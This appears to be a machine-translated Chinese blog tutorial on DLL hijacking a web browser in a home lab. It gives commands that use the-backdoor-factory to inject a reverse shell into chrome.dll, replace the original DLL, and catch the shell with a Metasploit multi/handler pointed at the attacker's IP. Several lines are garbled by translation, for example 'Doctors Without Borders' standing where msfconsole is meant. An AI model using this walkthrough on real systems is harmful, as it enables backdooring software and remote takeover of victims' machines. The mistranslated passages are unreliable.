您的位置  > 互联网

表哥教你如何使用多个DLL文件被称为共享DLL

如果进程尝试加载DLL时未指定DLL的绝对路径,它将尝试搜索这些特定目录以找到DLL。 只要黑客能够将恶意DLL放置在优先于正常DLL的目录中,就可以被欺骗。 系统首先加载恶意DLL,实现“劫持”

例如:对于文件系统来说,如果打开的是doc文档,就会被应用程序打开,运行时会加载系统的一个dll文件。 如果我们用恶意dll替换系统dll文件,我们会将DLL和doc文档放在一起,运行时会在当前目录中找到DLL,并首先执行系统目录中的DLL。

SRC也接受此类DLL劫持漏洞

以下是某浏览器的DLL劫持

攻击机卡利192.168.123.182

目标机Win7 192.168.123.243

需要使用(线程分析工具)

还有某浏览器,哈哈哈,表弟们别当真。

首先找到浏览器,然后查看哪些DLL文件是随浏览器一起启动的

将.dll复制到kali中

攻击机卡利执行

git clone https://github.com/secretsquirrel/the-backdoor-factory #下载T-B-F
pip install capstone #cd到T-B-F目录安装capstone库
./backdoor.py -f /root/tbf/the-backdoor-factory/chrome.dll #在tbf里面找到backdoor.py脚本运行

扫描注入点

./backdoor.py -f /root/tbf/the-backdoor-factory/chrome.dll -s

这里总共扫描了83个注射点。 我们只需要随机选择一个注入点即可。

这里选择注入点,输入注入点前面的数字,然后回车。

选择后,会自动生成一个带shell的dll文件。

进入这个文件夹,反弹壳的dll文件就在这个文件夹里。

将.dll文件复制过去并替换原文件

打开无国界医生组织

msfconsole
use multi/handler
set payload windows/shell_reverse_tcp
set LPORT 4444
set LHOST 192.168.123.182
exploit

跑步

可以看到已经成功上线了。

重要的事情说三遍